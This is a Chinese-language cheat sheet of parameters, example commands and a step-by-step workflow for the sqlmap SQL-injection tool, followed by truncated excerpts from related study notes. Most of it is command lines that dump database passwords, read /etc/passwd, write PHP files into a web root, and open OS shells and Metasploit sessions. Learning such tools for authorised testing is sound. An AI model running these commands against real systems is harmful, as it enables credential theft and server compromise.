常用引數
-u #注入點
-f #指紋判別資料庫型別
-b #獲取資料庫版本資訊
-p #指定可測試的引數(?page=1&id=2 -p 「page,id」)
-d 「」 #指定資料庫名
-t 「」 #指定表名
-c 「」 #指定字段
-s 「」 #儲存注入過程到乙個檔案,還可中斷,下次恢復在注入(儲存:-s 「xx.log」 恢復:-s 「xx.log」 –resume)
–columns #列出字段
–current-user #獲取當前使用者名稱
–current-db #獲取當前資料庫名稱
–users #列資料庫所有使用者
–passwords #資料庫使用者所有密碼
–privileges #檢視使用者許可權(–privileges -u root)
-u #指定資料庫使用者
–dbs #列出所有資料庫
–tables -d 「」 #列出指定資料庫中的表
–columns -t 「user」 -d 「mysql」 #列出mysql資料庫中的user表的所有字段
–dump-all #列出所有資料庫所有表
–exclude-sysdbs #只列出使用者自己新建的資料庫和表
–dump -t 「」 -d 「」 -c 「」 #列出指定資料庫的表的字段的資料(–dump -t users -d master -c surname)
–dump -t 「」 -d 「」 –start 2 –top 4 # 列出指定資料庫的表的2-4欄位的資料
–dbms #指定資料庫(mysql,oracle,postgresql,microsoft sql server,microsoft
常用語句
1…/sqlmap.py -u test.php?p=2 -f -b –current-user –current-db –users –passwords –dbs -v 0
2…/sqlmap.py -u test.php?p=2 -b –passwords -u root –union-use -v 2
3…/sqlmap.py -u test.php?p=2 -b –dump -t users -c username -d userdb –start 2 –stop 3 -v 2
4…/sqlmap.py -u test.php?p=2 -b –dump -c 「user,pass」 -v 1 –exclude-sysdbs
5…/sqlmap.py -u test.php?p=2 -b –sql-shell -v 2
6…/sqlmap.py -u test.php?p=2 -b –file-read 「c:\boot.ini」 -v 2
7…/sqlmap.py -u test.php?p=2 -b –file-write /test/test.txt –file-dest /var/www/html/1.txt -v 2
8…/sqlmap.py -u test.php?p=2 -b –os-cmd 「id」 -v 1
9…/sqlmap.py -u test.php?p=2 -b –os-shell –union-use -v 2
10…/sqlmap.py -u test.php?p=2 -b –os-pwn –msf-path=/opt/framework/msf3 –priv-esc -v 1
11…/sqlmap.py -u test.php?p=2 -b –os-pwn –msf-path=/opt/framework/msf3 -v 1
12…/sqlmap.py -u test.php?p=2 -b –os-bof –msf-path=/opt/framework/msf3 -v 1
13…/sqlmap.py -u test.php?p=2 –reg-add –reg-key=」hkey_local_nachine\sofeware\sqlmap」 –reg-value=test –reg-type=reg_sz –reg-data=1
14…/sqlmap.py -u test.php?p=2 -b –eta
15…/sqlmap.py -u 「 sqlmap/mysql/get_str_brackets.php?id=1″ -p id –prefix 「『)」 –suffix 「and (『abc』='abc」
16…/sqlmap.py -u 「 sqlmap/mysql/basic/get_int.php?id=1″ –auth-type basic –auth-cred 「testuser:testpass」
17…/sqlmap.py -l burp.log –scope=」(www)?.target.(com|net|org)」
18…/sqlmap.py -u 「 sqlmap/mysql/get_int.php?id=1″ –tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3
19…/sqlmap.py -u 「 sqlmap/mssql/get_int.php?id=1″ –sql-query 「select 『foo』」 -v 1
20…/sqlmap.py -u 「 mysql/get_int_4.php?id=1″ –common-tables -d testdb –banner
簡單的注入流程
1.讀取資料庫版本,當前使用者,當前資料庫
sqlmap -u test.php?p=2 -f -b –current-user –current-db -v 1
2.判斷當前資料庫使用者許可權
sqlmap -u test.php?p=2 –privileges -u 使用者名稱 -v 1
sqlmap -u test.php?p=2 –is-dba -u 使用者名稱 -v 1
3.讀取所有資料庫使用者或指定資料庫使用者的密碼
sqlmap -u test.php?p=2 –users –passwords -v 2
sqlmap -u test.php?p=2 –passwords -u root -v 2
4.獲取所有資料庫
sqlmap -u test.php?p=2 –dbs -v 2
5.獲取指定資料庫中的所有表
sqlmap -u test.php?p=2 –tables -d mysql -v 2
6.獲取指定資料庫名中指定表的字段
sqlmap -u test.php?p=2 –columns -d mysql -t users -v 2
7.獲取指定資料庫名中指定表中指定欄位的資料
sqlmap -u test.php?p=2 –dump -d mysql -t users -c 「username,password」 -s 「sqlnmapdb.log」 -v 2
8.file-read讀取web檔案
sqlmap -u test.php?p=2 –file-read 「/etc/passwd」 -v 2
9.file-write寫入檔案到web
sqlmap -u test.php?p=2 –file-write /localhost/mm.php –file-dest /var/www/html/xx.php -v 2
sqlmap學習筆記
環境 centos7 python2.7.5 sqlmap1.1.8.2 dev sqlmap檔案目錄 執行命名格式 python sqlmap.py h 常用命令 通過幫助資訊可以,找到需要的命令 h 顯示基本幫助資訊 hh 顯示高階幫助資訊 u url,url url 目標url cookie ...
Sqlmap學習筆記(三)
sqlmap效能優化設定 sqlmap設定持久http連線,sqlmap預設是一次連線成功後馬上關閉。http報文中相當於connection close 一次連線馬上關閉 要掃瞄站點的url比較多時,這樣比較耗費效能,所以需要將http連線持久化來提高掃瞄效能。http報文相當於connectio...
Sqlmap學習系列之二
1 v 按照官方文件說明,v 意為 verbose verbosity level 0 6 default 1 即 詳細等級包括0 6級,預設為1級 在測試語句最後以 v 等級 出現。經指正,詳細等級是指測試結果的輸出的詳細程度。2 level 按照官方文件說明,level level level ...